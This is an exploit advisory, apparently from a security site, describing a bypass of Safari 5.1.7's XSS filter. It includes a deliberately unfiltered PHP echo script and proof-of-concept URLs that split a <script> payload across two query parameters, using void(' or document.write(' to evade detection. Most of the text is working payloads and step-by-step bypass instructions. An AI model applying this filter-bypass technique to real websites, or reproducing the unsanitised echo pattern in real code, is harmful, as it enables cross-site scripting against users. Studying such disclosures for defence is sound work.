Apple Safari 5.1.7 (Last Version For Win) XSS Filter Bypass

2015.08.28
Credit: Mahdi.Hidden
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

************************************************************************** # Exploit Title: Apple Safari 5.1.7 (Last Version For Win) XSS Filter Bypass # Exploit Author: Mahdi.Hidden # Date: 2015-08-28 # Vendor Homepage : http://apple.com/ # Software Link: https://apple.com/safari/ # Version: 5.1.7 # Tested on: Windows ************************************************************************** Description XSS attacks occur when a PHP script doesn't filter the inputs and show it clearly on the webpage. This vulnerability is very usual on websites and web applications, and there are a lot of websites which have this vulnerability. XSS will happen with a JavaScript code in usual and that's why the browsers use XSS Filter. The XSS Filter on browsers detects JavaScript in URL and HTTP POST requests. If JavaScript is detected, the XSS Filter won't let JavaScript to executing. However, the XSS filter can by bypassed in some ways. i will show you what i found. Full Explanation As you know safari don't execute JS codes in Cross Site Scripting Vulnerability and that is for security reasons. it stops many XSS attacks. now, you have a vulnerable PHP Code like this (EX: safari.php): <?php // Echo the value of parameter one echo "This is text1:".$_GET['text1']."<br><br>"; // Echo the value of parameter two echo "This is text2:".$_GET['text2']."<br><br>"; ?> (This PHP script gets two parameters and print it without any filters. That allows you to make an XSS attack.) If you test a Cross Site Scripting payload like this in safari: http://[HOSTNAME]/[PATH]/safari.php?text1=<script>alert(/XSS/)</script>&text2=Something that JS code will be shown in the source but you will get no alerts! that's for high security of safari. if you try to test other payloads you will see the same result. now, let's try closing script tag on $_GET['text2']. http://[HOSTNAME]/[PATH]/safari.php?text1=<script>alert(/XSS/)&text2=</script> in this one, your code will be completely shown without detecting as XSS attack or something like that, but it will be known as a HTML text. OK, now i want to use quoting and put the none-code texts in 2 quotations! that means the HTML text will be known as a simple text. for example using void(''), put void(' in the parameter one and close it in parameter 2 like this ') now let's try it: http://[HOSTNAME]/[PATH]/safari.php?text1=<script>alert(/XSS/);void('&text2=')</script> You will see the alert!! Your JS code will be execute. instead of void(''), you can use document.write('') or etc. For example: http://[HOSTNAME]/[PATH]/safari.php?text1=<script>alert(/XSS/);document.write('&text2=')</script> POC http://[HOSTNAME]/[PATH]/safari.php?text1=<script>alert(/XSS/);void('&text2=')</script> Payload ?text1=<script>alert(/XSS/);void('&text2=')</script> Thanks. ************************************************************************** # Exploited by Mahdi.Hidden


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top